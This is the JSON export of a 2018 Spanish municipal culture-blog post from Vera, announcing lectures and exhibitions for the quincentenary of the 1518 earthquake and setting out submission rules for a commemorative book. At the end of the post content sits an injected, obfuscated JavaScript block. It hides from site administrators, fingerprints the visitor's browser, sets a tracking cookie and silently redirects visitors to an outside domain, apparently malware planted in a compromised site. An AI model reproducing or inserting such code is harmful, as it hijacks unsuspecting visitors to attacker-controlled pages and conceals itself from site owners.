{"id":3519,"date":"2018-03-02T09:25:56","date_gmt":"2018-03-02T09:25:56","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=3519"},"modified":"2018-04-18T06:52:12","modified_gmt":"2018-04-18T06:52:12","slug":"el-renacer-de-una-ciudad-vera-ano-de-la-cultura","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2018\/03\/02\/el-renacer-de-una-ciudad-vera-ano-de-la-cultura\/","title":{"rendered":"EL RENACER DE UNA CIUDAD. VERA, A\u00d1O DE LA CULTURA"},"content":{"rendered":"<p>Actividades de la Comisi\u00f3n del V Centenario del Terremoto de Vera y del A\u00f1o de la Cultura.<\/p>\n<p><!--more--><\/p>\n<p>El municipio de Vera se prepara para iniciar durante este a\u00f1o 2018 un conjunto de obras, actos y actividades culturales a trav\u00e9s de su organizaci\u00f3n, llevada a cabo por la <b>Comisi\u00f3n del V Centenario <\/b><b>del Terremoto de Vera,<\/b> y con motivo del <b>A<\/b><b>niversario del V <\/b><b>C<\/b><b>entenario<\/b> del destructivo terremoto que sufri\u00f3 la Ciudad de la Vera Vieja, que fue musulmana hasta el 10 de junio de 1488, la del Cerro (llamada luego &#8216;del Esp\u00edritu Santo&#8217;) la noche del 9 de noviembre de 1518, y el comienzo de la edificaci\u00f3n de la Vera Nueva, la renacentista, la actual, la del llano. Y, efectivamente, el Pleno del Ayuntamiento declar\u00f3 por unanimidad el a\u00f1o 2018 como el &#8216;<b>A\u00f1o de la Cultura<\/b>&#8216;.<\/p>\n<p>La actividad central sobre la que girar\u00e1 el Aniversario es el desarrollo del <b>Proyecto para la Consolidaci\u00f3n de los Restos Arqueol\u00f3gicos del Cerro del Esp\u00edritu Santo<\/b>, varias fases de un ilusionante y ambicioso proyecto que tiene por fin conservar a largo plazo los restos de la antigua fortaleza y crear un espacio muse\u00edstico y tur\u00edstico en las inmediaciones del Cerro. Todo ello transformar\u00e1 definitivamente la ciudad tur\u00edstica para bien de sus habitantes y de sus visitantes.<\/p>\n<p><b>El Renacer de una Ciudad<\/b> es el t\u00edtulo bajo el que se desarrollar\u00e1n durante los a\u00f1os 2018 y 2019 todo tipo de actividades culturales y educativas.<\/p>\n<p>Se informa a los investigadores y ponentes que las <b>conferencias y comunicaciones<\/b> que tendr\u00e1n lugar en el programa de <i>El Renacer de una Ciudad<\/i> deber\u00e1n enviarse a la siguiente direcci\u00f3n de correo electr\u00f3nico para su publicaci\u00f3n en un volumen tras la clausura de las mismas: <a href=\"mailto:libroterremotodevera@outlook.es\">libroterremotodevera@outlook.es<\/a>. Las bases estar\u00e1n disponibles en la p\u00e1gina web oficial del Ayuntamiento de Vera (vera.es), en el Blog de Cultura del Ayuntamiento (https:\/\/blog.vera.es\/cultura\/) e incluidas al final de este art\u00edculo.<\/p>\n<p>ACTIVIDADES. EXPOSICIONES, CONFERENCIAS Y CONCIERTOS:<\/p>\n<ul>\n<li><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\"><b>VIERNES, 2 MARZO:<\/b> <b>MARISA ANDR\u00c9S UROZ <\/b>(Licenciada y Diplomada en Estudios Avanzados de Historia, exdirectora del Archivo Municipal de Vera y Directora del Archivo Hist\u00f3rico Provincial de Almer\u00eda). <i>El Archivo Municipal de Vera. Cr\u00f3nica de una Recuperaci\u00f3n.<\/i><\/span><\/span><\/li>\n<li><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\"><b>VIERNES, 27 ABRIL<\/b><\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\">. <\/span><\/span><strong><span style=\"font-family: Arial, sans-serif\"><i>La ciudad de Vira, un territorio fronterizo a lo largo de la Edad Media<\/i><\/span><\/strong><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\">. <\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\"><b>LORENZO CARA BARRIONUEVO <\/b><\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\">(Arque\u00f3logo y <\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\">exconservador<\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\"> de la Alcazaba de Almer\u00eda)<\/span><\/span><b> <\/b><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\"><b>Y DOMINGO ORTIZ SOLER <\/b><\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\">(Arque\u00f3logo y Director del Museo Hist\u00f3rico de Vera)<\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\">.<\/span><\/span><\/li>\n<li><span style=\"font-family: Arial, sans-serif\"><span style=\"color: #000000\"><b>JUEVES, 7 JUNIO: JUAN FRANCISCO JIM\u00c9NEZ ALC\u00c1ZAR <\/b><\/span><span style=\"color: #000000\">(Catedr\u00e1tico de Historia Medieval de la Universidad de Murcia)<\/span><span style=\"color: #000000\">. <\/span><span style=\"color: #000000\"><i>Castilla en la \u00abTierra de Vera\u00bb: conquista y repoblaci\u00f3n<\/i><\/span><\/span><\/li>\n<li><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\"><b>JUEVES, 28 JUNIO: ESTHER VIVANCOS MULERO<\/b> (Doctora en Lengua Espa\u00f1ola por la Universidad de Granada. Profesora Asociada de la Universidad de Murcia).<b> <\/b><i>La lengua del repoblador. <\/i><i>Estudio hist\u00f3rico-ling\u00fc\u00edstico de la <\/i><i>Tierra de Vera (siglos XVI-XVII).<\/i><\/span><\/span><\/li>\n<li><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\"><b>V<\/b><b>IERNES, 20 JULIO: <\/b><span style=\"color: #800000\">Exposici\u00f3n <\/span><span style=\"color: #800000\">de piezas arqueol\u00f3gicas de Vera enviadas desde el Museo Arqueol\u00f3gico de Almer\u00eda (Lugar: Sal\u00f3n de Usos M\u00faltiples, Plaza Mayor de Vera).<\/span><\/span><\/span><\/li>\n<li><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\"><b>S\u00c1BADO<\/b><b>, <\/b><b>21<\/b><b> <\/b><b>JULIO<\/b><b>: MONTSERRAT MENASANCH<\/b> (Colaboradora de la Universidad Aut\u00f3noma de Barcelona, Departamento de Antropolog\u00eda Social y de Prehistoria)<b>. <\/b><i>El poblamiento Altomedieval de la Depresi\u00f3n de Vera y el Cerro Montroy. <\/i>(En colaboraci\u00f3n con la Asociaci\u00f3n <i>Amigos del Argar<\/i>).<\/span><\/span><\/li>\n<li><span style=\"font-family: Arial, sans-serif\"><span style=\"color: #000000\"><b>V<\/b><\/span><span style=\"color: #000000\"><b>IERNES, 31<\/b><\/span><span style=\"color: #000000\"> DE AGOSTO: <\/span><span style=\"color: #000000\"><b>MAR\u00cdA <\/b><\/span><span style=\"color: #000000\"><b>DULCE <\/b><\/span><span style=\"color: #000000\"><b>ARCAS CAMPOY<\/b><\/span><span style=\"color: #000000\">. (<\/span><span style=\"color: #000000\">Catedr\u00e1tica de Estudios \u00c1rabes de la <\/span><span style=\"color: #000000\">Universidad de <\/span><span style=\"color: #000000\">La Laguna, Tenerife). <\/span><i>Vera, capital fronteriza del levante del reino nazar\u00ed (siglo XV). Una visita retrospectiva<\/i>. <\/span><\/li>\n<li><span style=\"font-family: Arial, sans-serif\"><b>VIERNES, 7<\/b> SEPTIEMBRE: <b>V\u00cdCTOR LUQUE <\/b><b>DE HARO<\/b>. (Doctorando del Departamento de Geograf\u00eda, Historia y Humanidades de la Universidad de Almer\u00eda). <i>Morir en Vera: epidemias, desigualad y transici\u00f3n demogr\u00e1fica<\/i>.<\/span><\/li>\n<li><span style=\"font-family: Arial, sans-serif\"><b>VIERNES, 21<\/b> SEPTIEMBRE: <b>ANDR\u00c9S S\u00c1NCHEZ PIC\u00d3N <\/b>(Catedr\u00e1tico de Historia Econ\u00f3mica de la Universidad de Almer\u00eda). <i>La declaraci\u00f3n del estado de excepci\u00f3n de 1844 en Vera.<\/i><\/span><\/li>\n<li><span style=\"color: #ff3333\"><span style=\"font-family: Arial, sans-serif\"><span style=\"color: #000000\"><b>VIERNES, 26 OCTUBRE: <\/b><\/span><span style=\"color: #000000\"><b>Exposici\u00f3n de documentos<\/b><\/span><span style=\"color: #000000\"> sobre Vera de la Biblioteca Nacional, el Archivo de Simancas y el <\/span><span style=\"color: #000000\">Archivo <\/span><span style=\"color: #000000\">Municipal de Vera. <\/span><span style=\"color: #000000\">Sala de Exposiciones del <\/span><span style=\"color: #000000\">Convento de la Victoria.<\/span><\/span><\/span><\/li>\n<li><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\"><b>VIERNES<\/b><\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\">, <\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\"><b>9<\/b><\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\"><b> NOVIEMBRE<\/b><\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\">: <\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\"><b>C\u00c9SAR <\/b><\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\"><b>JOS\u00c9<\/b><\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\"><b> OLIVERA <\/b><\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\"><b>SERRANO, 19:00<\/b><\/span><\/span><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\">. (Cient\u00edfico titular del CSIC, Instituto de Historia. Madrid). <\/span><\/span><span style=\"font-family: Arial, sans-serif\"><i>El terremoto de Vera de 1518: una visi\u00f3n hist\u00f3rica <\/i><\/span><\/li>\n<li><span style=\"font-family: Arial, sans-serif\"><span style=\"color: #000000\"><b>VIERNES, 30 NOVIEMBRE (<\/b><\/span><span style=\"color: #000000\">22 NOVIEMBRE: D\u00cdA INTERNACIONAL DEL GITANO ANDALUZ): <\/span><span style=\"color: #000000\"><b>MANUEL MART\u00cdNEZ MART\u00cdNEZ<\/b><\/span> <span style=\"color: #000000\">(Profesor. Doctor en Geograf\u00eda e Historia por la Universidad de Almer\u00eda)<\/span><span style=\"color: #000000\">. <\/span><span style=\"color: #000000\"><i>Historia de los gitanos <\/i><\/span><span style=\"color: #000000\"><i>espa\u00f1oles. El caso de Vera<\/i><\/span><span style=\"color: #000000\">.<\/span><\/span><\/li>\n<li><span style=\"font-family: Arial, sans-serif\"><span style=\"color: #000000\"><b>VIERNES, 1<\/b><\/span><span style=\"color: #000000\">4 DE DICIEMBRE: <\/span><span style=\"color: #000000\"><b>VALERIANO S\u00c1NCHEZ RAMOS <\/b><\/span><span style=\"color: #000000\">(Profesor de Historia. Miembro de la Academia Andaluza de la Historia)<\/span> <span style=\"color: #000000\"><i>La dif\u00edcil convivencia morisca en la Tierra de Vera<\/i><\/span><span style=\"color: #000000\">.<\/span><\/span><\/li>\n<li><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\"><b>CLAUSURA. <\/b><b>VIERNES 22 FEBRERO:<\/b> <b>LUIS CANO <\/b>(Arquitecto y Doctor por la Universidad de Granada). <i>Historia Urbana de Vera.<\/i><\/span><\/span>\n<ul>\n<li><span style=\"color: #000000\"><span style=\"font-family: Arial, sans-serif\">Venta de las Actas del Congreso y concierto de guitarra medieval y renacentista a cargo de <b>PEDRO RIDAO NAVARRO<\/b> (Estudiante del Conservatorio Narciso Yepes, de Lorca).<\/span><\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p align=\"left\"><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/03\/CARTEL-ACTOS-HISTORIA-RENACER-DE-UNA-CIUDAD17-04-2018-reduc.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-3558\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/03\/CARTEL-ACTOS-HISTORIA-RENACER-DE-UNA-CIUDAD17-04-2018-reduc-212x300.jpg\" alt=\"\" width=\"212\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/03\/CARTEL-ACTOS-HISTORIA-RENACER-DE-UNA-CIUDAD17-04-2018-reduc-212x300.jpg 212w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/03\/CARTEL-ACTOS-HISTORIA-RENACER-DE-UNA-CIUDAD17-04-2018-reduc.jpg 591w\" sizes=\"(max-width: 212px) 100vw, 212px\" \/><\/a><\/p>\n<p align=\"left\"><span style=\"font-size: x-large\"><u><b>V Centenario del Terremoto de Vera. El libro. <\/b><\/u><\/span><span style=\"font-size: x-large\"><u><b>Bases de los textos de investigaci\u00f3n para su publicaci\u00f3n<\/b><\/u><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">El a\u00f1o 2018 est\u00e1 marcado en rojo en el calendario de la ciudad de Vera por la <b>conmemoraci\u00f3n de dos importantes aniversarios<\/b>: el quinto centenario del terremoto que destruy\u00f3 la antigua ciudad, situada en el cerro del Esp\u00edritu Santo, y los 50 a\u00f1os de los Festivales de Arte, antesala de las Fiestas Patronales de San Cleof\u00e1s. <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">Por ello, <b>el Pleno declar\u00f3 por unanimidad el 2018 como \u2018A\u00f1o de la Cultura\u2019<\/b>, por lo que se suceder\u00e1n las actividades culturales de todo tipo a lo largo de los doce meses. <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">V Centenario del Terremoto de Vera. El libro acepta y publicar\u00e1 art\u00edculos sobre temas de Antropolog\u00eda social y cultural de car\u00e1cter descriptivo o etnogr\u00e1fico, de Historia, teniendo como nexo en com\u00fan la Vera de los siglos XIV- XV-XVI y XVII, o de Arqueolog\u00eda centr\u00e1ndose en el cerro Esp\u00edritu Santo. <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">Se pretende hacer un libro t\u00e9cnico, dirigido sobre todo a especialistas e investigadores. Tiene como objetivo principal la publicaci\u00f3n de art\u00edculos originales e in\u00e9ditos, que sean el resultado de investigaciones emp\u00edricas y que supongan un incremento de nuestro conocimiento sobre la tem\u00e1tica a tratar. <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">El idioma ser\u00e1 el espa\u00f1ol. <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\"><b>1. Formato y presentaci\u00f3n. <\/b><\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">Los textos se enviar\u00e1n en <b>formato digita<\/b>l (archivo\/fichero .doc), con una <b>extensi\u00f3n m\u00e1xima de 50.000 caracteres<\/b>, y antecedidos por: <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">&#8211; El <b>t\u00edtulo del trabajo en espa\u00f1ol y su correcta traducci\u00f3n al ingl\u00e9s<\/b>, <b>fecha de finalizaci\u00f3n<\/b>, un <b>resumen <\/b>(de extensi\u00f3n entre 50 y 100 palabras) en espa\u00f1ol e ingl\u00e9s, y cinco <b>palabras clave (en espa\u00f1ol e ingl\u00e9s)<\/b>. El manuscrito ir\u00e1 acompa\u00f1ado de <b>otra p\u00e1gina con los datos personales y profesionales del autor o autores<\/b>, su <b>filiaci\u00f3n institucional y profesional<\/b>, <b>direcci\u00f3n particular <\/b>completa y del <b>centro de trabajo<\/b>, <b>e-mail <\/b>y otra informaci\u00f3n de contacto. <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">Se aplicar\u00e1 <b>tipograf\u00eda Times New Roman con cuerpo 12<\/b>, <b>interlineado simple<\/b>, apareciendo <b>los t\u00edtulos de los apartados en negrita <\/b>y las <b>citas en redonda y entre comillas inglesas dobles<\/b>. Ha de utilizarse el mismo tipo y tama\u00f1o de letra en todo el escrito: el t\u00edtulo, los res\u00famenes, el texto, las citas literales, las notas y la bibliograf\u00eda. <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">En art\u00edculos que superen la extensi\u00f3n m\u00e1xima establecida deber\u00e1 ser informados a la Redacci\u00f3n y que estos la aprueben. <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\"><b>2. Cita o referencias bibliogr\u00e1ficas. <\/b><\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">Las <b>notas <\/b>ir\u00e1n <b>al final del texto <\/b>y no a pie de p\u00e1gina siguiendo las siguientes recomendaciones cuando se trate de <b>citas bibliogr\u00e1ficas<\/b>: <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\">\u2022 <span style=\"font-size: medium\"><b>Referencia a una monograf\u00eda<\/b>:<\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">MART\u00cdNEZ POZO, M.A.: <i>Moros y cristianos en el mediterr\u00e1neo espa\u00f1ol. Antropolog\u00eda, educaci\u00f3n, historia y valores. <\/i>Ed. Gami. Granada, 2015. <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\">\u2022 <span style=\"font-size: medium\"><b>Referencia a una contribuci\u00f3n dentro de una obra colectiva<\/b>: MORENO, I.: \u00abPoder, mercado e identidades colectivas. Las fiestas populares en la encrucijada\u00bb en OLIVER NARBONA, M. (Coord.): <i>Jornadas de Antropolog\u00eda de las fiestas. Identidad, mercado y poder. <\/i>Expofiesta. Feria Nacional de Fiestas Populares, 1999. p. 18-19. <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\">\u2022 <span style=\"font-size: medium\"><b>Referencia a un art\u00edculo de una publicaci\u00f3n peri\u00f3dica: <\/b><\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">MART\u00cdNEZ POZO, M.A.: \u00abGastronom\u00eda, arte culinario y bebidas en las fiestas de moros y cristianos\u00bb en <i>Revista Folklore, 394<\/i>. A\u00f1o 2014. p. 11-21. <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\">\u2022 <span style=\"font-size: medium\"><b>Referencia a documentos: <\/b>Archivo Hist\u00f3rico Diocesano de Guadix (AHDGu). <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">La bibliograf\u00eda se limitar\u00e1 a los materiales (libros, art\u00edculos,&#8230;) referidos o citados en el texto; por tanto, no deber\u00e1n incluirse en la bibliograf\u00eda materiales que no hayan sido referidos o citados antes en este. <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">La organizaci\u00f3n de la bibliograf\u00eda se har\u00e1 por orden alfab\u00e9tico de los apellidos de los autores. <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">Si hay varias referencias de un mismo autor, ir\u00e1n ordenadas cronol\u00f3gicamente por a\u00f1o de edici\u00f3n, de la m\u00e1s antigua a la m\u00e1s reciente. <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\"><b>3. Ilustraciones. <\/b><\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">Los textos se pueden acompa\u00f1ar de <b>gr\u00e1ficos <\/b>y <b>fotograf\u00edas <\/b>siempre que \u00e9stos <b>se puedan publicar de manera libre y gratuita<\/b>, vayan con sus correspondientes <b>pies de imagen con indicaci\u00f3n de autor\u00eda o fuente<\/b>, y se indique el <b>punto de inserci\u00f3n deseado<\/b>. Las im\u00e1genes se presentar\u00e1n en <b>formato digital estandarizado <\/b>(jpg para fotograf\u00edas) y <b>en archivos independientes<\/b>, con calidad suficiente (<b>resoluci\u00f3n m\u00ednima 300 ppp<\/b>). <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\"><b>4. Proceso de evaluaci\u00f3n. <\/b><\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\"><i>V Centenario del Terremoto de Vera. El libro\u00bb <\/i><b>confirmar\u00e1 la recepci\u00f3n de los manuscritos<\/b>. <b>El consejo editorial decidir\u00e1 sobre su publicaci\u00f3n siempre y cuando re\u00fana las condiciones \u00f3ptimas y cumpla con las bases reguladoras<\/b>. <b>Los materiales ser\u00e1n enviados a tres revisores an\u00f3nimos e independientes seleccionados por el consejo editorial y por el editor<\/b>, que juzgar\u00e1n la idoneidad de su publicaci\u00f3n y, en su caso, establecer\u00e1n las recomendaciones o indicaciones oportunas. Los art\u00edculos de las conferencias establecidas, coordinados por el comit\u00e9, tambi\u00e9n ser\u00e1n evaluados de forma an\u00f3nima y revisados anteriormente a su publicaci\u00f3n. <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\"><b>La versi\u00f3n final, antes de su publicaci\u00f3n, ser\u00e1 enviada al autor para que d\u00e9 el visto bueno, teniendo de plazo una semana para su revisi\u00f3n.<\/b>Los art\u00edculos y materiales para publicaci\u00f3n deben enviarse por correo electr\u00f3nico a <i><b>libroterremotodevera.outlook.es <\/b><\/i><\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">Los autores podr\u00e1n contactar con la editora (D\u00f1a. Ana Mar\u00eda G\u00f3mez Rom\u00e1n) por correo electr\u00f3nico en <i><b>libroterremotodevera.outlook.es <\/b><\/i><\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\"><b>4. Plazo de presentaci\u00f3n de art\u00edculos. <\/b><\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\">El plazo de presentaci\u00f3n de art\u00edculos terminar\u00e1 el d\u00eda 17 de diciembre de 2018. Todo art\u00edculo o conferencia entregada fuera de plazo no formar\u00e1 parte del libro. <\/span><\/span><\/p>\n<p align=\"left\"><span style=\"color: #000000\"><span style=\"font-size: medium\"><b>5. Presentaci\u00f3n del libro. <\/b><\/span><\/span><\/p>\n<p><span style=\"font-size: medium\">La presentaci\u00f3n del libro se realizar\u00e1 durante el mes de febrero de 2019 coincidiendo con la finalizaci\u00f3n del ciclo de conferencias y, especialmente con el d\u00eda 19 de febrero, por ser el nacimiento de la Vera Nueva.<\/span><script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Actividades de la Comisi\u00f3n del V Centenario del Terremoto de Vera y del A\u00f1o de la Cultura.<\/p>\n","protected":false},"author":7,"featured_media":3526,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[105,3,109],"tags":[116,283],"class_list":["post-3519","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-actividades","category-archivo","category-historia","tag-arqueologia","tag-comision-del-v-centenario-del-terremoto-de-vera"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3519","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=3519"}],"version-history":[{"count":5,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3519\/revisions"}],"predecessor-version":[{"id":3559,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3519\/revisions\/3559"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/3526"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=3519"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=3519"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=3519"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}